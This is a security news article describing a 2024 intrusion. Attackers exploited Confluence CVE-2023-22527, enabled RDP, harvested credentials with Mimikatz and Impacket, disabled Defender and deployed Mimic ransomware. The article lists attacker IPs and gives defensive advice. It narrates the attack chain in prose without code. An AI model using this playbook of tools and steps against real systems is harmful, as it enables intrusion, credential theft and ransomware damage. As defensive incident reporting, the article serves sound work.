Critical Confluence Flaw Lets Attackers Unlock RDP and Run Code Remotely

A significant security incident in late June 2024 demonstrates how an unpatched Atlassian Confluence server was leveraged as an initial access vector, resulting in attackers enabling Remote Desktop Protocol (RDP) access and facilitating broad remote code execution.

The threat actor exploited CVE-2023-22527, a template injection vulnerability in Confluence, to establish persistent, privileged access within the target organization’s network, ultimately deploying ransomware and impacting core IT infrastructure.

Attack Overview

The campaign began with reconnaissance and exploitation from multiple external IP addresses, notably 45.227.254[.]124 and 91.191.209[.]46.

The initial phase saw a proof-of-concept “whoami” execution, swiftly escalating to the deployment of a Metasploit Meterpreter payload via curl.

This established a C2 channel and enabled the threat actor to deliver additional tooling, including AnyDesk for persistent access.

Automation was evident, with repeated scripted actions: installation of AnyDesk, creation of local administrator accounts via batch scripts (notably “noname” with a hardcoded password), and registry modifications to enable RDP (fDenyTSConnections set to 0).

The intruder further manipulated firewall configurations using netsh advfirewall to guarantee unimpeded RDP connectivity.

Sustained efforts at privilege escalation were observed, with the attacker leveraging named pipe impersonation techniques-specifically exploiting the RPCSS variant to achieve SYSTEM-level access.

According to the report, this enabled the creation of persistent local admin accounts and reinstallation of AnyDesk as a service, solidifying long-term foothold.

Post-exploitation tooling included Mimikatz, ProcessHacker, and Impacket’s secretsdump.py, executed both for credential harvesting and lateral movement.

LSASS process memory dumps, NTLM hash extraction, and pass-the-hash authentication facilitated the compromise of domain administrator accounts.

The attacker attempted to escalate further using Zerologon (CVE-2020-1472), though this effort failed operationally.

Once domain-level credentials were secured, the adversary moved laterally using WMExec, RDP, and SMB share creation. Network reconnaissance was enhanced with SoftPerfect NetScan, enumerating key ports (445, 3389, etc.) and SMB shares.

The attacker leveraged Impacket tools for additional credential access and attempted but failed to exploit PrintNightmare (CVE-2021-34527).

The ability to pivot was further demonstrated through direct RDP sessions, initiated both manually and automatically via NetScan GUI, targeting file and backup servers.

The attacker’s playbook included disabling defender using Defender Control (DC.exe), as well as utilizing Process Hacker to tamper with defenses and processes ahead of ransomware deployment.

Ransomware Deployment

After approximately 62 hours of post-exploitation activity, the threat actor delivered and executed ELPACO-team.exe-a Mimic ransomware variant-across multiple high-value servers, including backup and file servers.

The payload was transferred over SMB and executed via RDP. The ransomware, packaged as a self-extracting 7-zip archive, encrypted files and established persistence by setting registry “Run” keys.

Unlike typical ransomware incidents, evidence suggests minimal data exfiltration, with less than 70MB transferred externally, mostly tied to remote access operations.

The campaign concluded with the deletion of select event logs and use of notepad to inspect ransom notes, signaling end-of-attack activity.

Organizations operating Confluence should urgently patch known vulnerabilities, continuously monitor for suspicious child processes (especially from tomcat9.exe), and scrutinize anomalous RDP/firewall configuration changes for rapid detection and containment of similar campaigns.

Indicators of Compromise (IoCs)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates